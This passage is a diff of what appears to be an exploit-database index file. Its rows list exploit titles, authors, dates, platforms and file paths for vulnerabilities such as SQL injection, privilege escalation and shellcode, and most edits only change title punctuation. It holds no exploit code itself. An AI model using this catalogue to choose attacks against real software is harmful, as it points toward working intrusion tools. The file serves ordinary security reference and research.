iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork - 'path' Parameter Remote File Inclusion",2008-11-06,DeltahackingTEAM,php,webapps,0 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0 -32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - Atepmon.sys IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 +32572,platforms/windows/dos/32572.txt,"Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow",2008-11-07,alex,windows,dos,0 32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service",2008-11-09,killprog.org,windows,dos,0 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0 32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 @@ -30401,7 +30401,7 @@ id,file,description,date,author,platform,type,port 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 - Persistent Cross-Site Scripting",2014-06-03,Peru,windows,webapps,0 33644,platforms/php/webapps/33644.txt,"Basic-CMS - 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! Component F!BB 1.5.96 RC - SQL Injection / HTML Injection",2009-09-17,"Jeff Channell",php,webapps,0 -33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 +33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX 'CLIproxy.dll' Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting",2010-02-12,"Beenu Arora",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 @@ -30713,7 +30713,7 @@ id,file,description,date,author,platform,type,port 33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Arbitrary File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 -34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 +34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - (wysija-newsletters) Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,php,remote,80 33992,platforms/asp/webapps/33992.txt,"Platnik 8.1.1 - Multiple SQL Injections",2010-05-17,podatnik386,asp,webapps,0 @@ -30850,7 +30850,7 @@ id,file,description,date,author,platform,type,port 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80 34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0 -34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 +34131,platforms/windows/local/34131.py,"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0 34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443 34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status - Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0 34134,platforms/lin_x86-64/local/34134.c,"Linux Kernel < 3.2.0-23 (Ubuntu 12.04 x64) - 'ptrace/sysret' Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_x86-64,local,0 @@ -31023,7 +31023,7 @@ id,file,description,date,author,platform,type,port 34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk - products_search.php search_category_id Parameter Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0 34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 - vmtadmin.cgi Remote Command Execution (Metasploit)",2014-08-14,Metasploit,linux,remote,80 34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox - 3D Acceleration Virtual Machine Escape (Metasploit)",2014-08-14,Metasploit,win_x86-64,remote,0 -34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0 +34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - 'VBoxGuest.sys' Privilege Escalation (Metasploit)",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0 @@ -31627,7 +31627,6 @@ id,file,description,date,author,platform,type,port 35006,platforms/windows/remote/35006.html,"WebKit - Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 35010,platforms/osx/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,osx,local,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 35012,platforms/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Parameter Cross-Site Scripting",2010-11-23,"Usman Saeed",multiple,webapps,0 @@ -31794,7 +31793,7 @@ id,file,description,date,author,platform,type,port 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 -35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 +35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting",2011-01-04,"High-Tech Bridge SA",php,webapps,0 @@ -31917,7 +31916,7 @@ id,file,description,date,author,platform,type,port 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 -35325,platforms/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 +35325,platforms/hardware/webapps/35325.txt,"Netgear WNR500 Wireless Router - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0 35380,platforms/php/remote/35380.rb,"Pandora Fms - SQL Injection Remote Code Execution (Metasploit)",2014-11-26,Metasploit,php,remote,80 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 @@ -32227,7 +32226,7 @@ id,file,description,date,author,platform,type,port 35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,php,remote,80 -35661,platforms/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - (ahcache.sys/NtApphelpCacheControl) Privilege Escalation",2015-01-01,"Google Security Research",windows,local,0 +35661,platforms/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - 'ahcache.sys' NtApphelpCacheControl Privilege Escalation",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WordPress Plugin WP Ajax Recent Posts 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 @@ -32380,7 +32379,7 @@ id,file,description,date,author,platform,type,port 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35984,platforms/php/webapps/35984.txt,"Joomla! Component Virtual Money 'com_virtualmoney' 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0 35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0 -35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 +35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - '.mp4' Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash (PoC)",2014-12-12,"Drozdova Liudmila",windows,dos,0 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 @@ -33272,10 +33271,10 @@ id,file,description,date,author,platform,type,port 36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal - prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal - team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,cgi,webapps,0 -36773,platforms/windows/dos/36773.c,"Microsoft Windows - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 +36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36774,platforms/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 -36776,platforms/windows/dos/36776.py,"MS Windows (HTTP.sys) - HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 +36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36777,platforms/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 @@ -33531,7 +33530,7 @@ id,file,description,date,author,platform,type,port 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,Wadeek,php,webapps,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service)",2015-05-18,"Denis Andzakovic",linux,dos,0 -37052,platforms/windows/local/37052.c,"Microsoft Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 +37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) (PoC)",2015-05-18,"Marcus Meissner",multiple,dos,0 37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal",2015-05-18,pandujar,php,webapps,0 37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 - Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80 @@ -33723,7 +33722,7 @@ id,file,description,date,author,platform,type,port 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80 37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 - '.wav' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0 -37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0 +37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 - '.mp4' Crash (PoC)",2015-06-16,"SATHISH ARTHAR",windows,dos,0 37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80 @@ -34336,21 +34335,21 @@ id,file,description,date,author,platform,type,port 37906,platforms/php/webapps/37906.txt,"WordPress Plugin Googmonify 0.8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2015-08-21,"Ehsan Hosseini",php,webapps,80 37907,platforms/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",php,webapps,80 37908,platforms/windows/dos/37908.py,"Konica Minolta FTP Utility 1.0 - Remote Denial of Service (PoC)",2015-08-21,"Shankar Damodaran",windows,dos,21 -37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 - wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 -37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 - wwlib.dll Type Confusion (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 -37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 - OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)",2015-08-21,"Google Security Research",windows,dos,0 -37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 - mso.dll Arbitrary Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 -37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 - mso.dll Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 +37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 - 'wwlib.dll' fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0 +37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 - 'wwlib.dll' Type Confusion (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 +37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 - 'OGL.dll' DpOutputSpanStretch::OutputSpan Out of Bounds Write (MS15-080)",2015-08-21,"Google Security Research",windows,dos,0 +37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 - 'mso.dll' Arbitrary Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 +37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 - 'mso.dll' Use-After-Free (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37914,platforms/windows/dos/37914.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0 37915,platforms/windows/dos/37915.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37916,platforms/windows/dos/37916.txt,"Microsoft Windows - ATMFD.DLL Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37917,platforms/windows/dos/37917.txt,"Microsoft Windows - ATMFD.DLL Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37916,platforms/windows/dos/37916.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37917,platforms/windows/dos/37917.txt,"Microsoft Windows - 'ATMFD.DLL' Out-of-Bounds Read Due to - Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0 37918,platforms/windows/dos/37918.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 37919,platforms/windows/dos/37919.txt,"Microsoft Windows - 'win32k.sys' TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0 -37920,platforms/windows/dos/37920.txt,"Microsoft Windows - ATMFD.DLL Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 -37921,platforms/windows/dos/37921.txt,"Microsoft Windows - ATMFD.dll CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37922,platforms/windows/dos/37922.txt,"Microsoft Windows - ATMFD.DLL CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 -37923,platforms/windows/dos/37923.txt,"Microsoft Windows - ATMFD.dll CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 +37920,platforms/windows/dos/37920.txt,"Microsoft Windows - 'ATMFD.DLL' Write to Uninitialized Address Due to - Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0 +37921,platforms/windows/dos/37921.txt,"Microsoft Windows - 'ATMFD.dll' CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37922,platforms/windows/dos/37922.txt,"Microsoft Windows - 'ATMFD.DLL' CFF table (ATMFD+0x34072 - / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0 +37923,platforms/windows/dos/37923.txt,"Microsoft Windows - 'ATMFD.dll' CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0 37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 - MSPTLS Heap Index Integer Underflow (MS15-081)",2015-08-21,"Google Security Research",windows,dos,0 37925,platforms/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0 37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 @@ -34440,7 +34439,7 @@ id,file,description,date,author,platform,type,port 38028,platforms/windows/dos/38028.pl,"PFTP Server 8.0f Lite - textfield Local Buffer Overflow (SEH)",2015-08-31,"Robbie Corley",windows,dos,0 38029,platforms/hardware/webapps/38029.txt,"Edimax PS-1206MF - Web Admin Authentication Bypass",2015-08-31,smash,hardware,webapps,80 38030,platforms/php/webapps/38030.php,"Ganglia Web Frontend < 3.5.1 - PHP Code Execution",2015-08-31,"Andrei Costin",php,webapps,0 -38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - msxml5.dll Crash (PoC)",2015-08-31,"Mohammad Reza Espargham",windows,dos,0 +38031,platforms/windows/dos/38031.pl,"Microsoft Office 2007 - 'msxml5.dll' Crash (PoC)",2015-08-31,"Mohammad Reza Espargham",windows,dos,0 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 @@ -34607,7 +34606,7 @@ id,file,description,date,author,platform,type,port 38214,platforms/windows/dos/38214.txt,"Microsoft Excel 2007/2010/2013 - BIFFRecord Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 38215,platforms/windows/dos/38215.txt,"Microsoft Office 2007 - BIFFRecord Length Use-After-Free",2015-09-16,"Google Security Research",windows,dos,0 38216,platforms/windows/dos/38216.txt,"Microsoft Office 2007 - OLESSDirectyEntry.CreateTime Type Confusion",2015-09-16,"Google Security Research",windows,dos,0 -38217,platforms/windows/dos/38217.txt,"Microsoft Office 2007 - OGL.dll ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",windows,dos,0 +38217,platforms/windows/dos/38217.txt,"Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)",2015-09-16,"Google Security Research",windows,dos,0 38218,platforms/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local SEH Exploit",2015-09-17,cor3sm4sh3r,windows,local,0 38219,platforms/windows/local/38219.py,"ZTE PC UI USB Modem Software - Buffer Overflow",2015-09-17,R-73eN,windows,local,0 38220,platforms/windows/local/38220.py,"IKEView R60 - Buffer Overflow Local Exploit (SEH)",2015-09-17,VIKRAMADITYA,windows,local,0 @@ -35077,8 +35076,8 @@ id,file,description,date,author,platform,type,port 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - '.asx' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 -38713,platforms/windows/dos/38713.txt,"Microsoft Windows - Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 -38714,platforms/windows/dos/38714.txt,"Microsoft Windows - Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38713,platforms/windows/dos/38713.txt,"Microsoft Windows - Kernel 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38714,platforms/windows/dos/38714.txt,"Microsoft Windows - Kernel 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815 / DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900 38716,platforms/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 38717,platforms/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 @@ -35273,7 +35272,7 @@ id,file,description,date,author,platform,type,port 38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"Apple Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 -38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 +38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 @@ -35322,7 +35321,7 @@ id,file,description,date,author,platform,type,port 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0 -38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 +38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object - 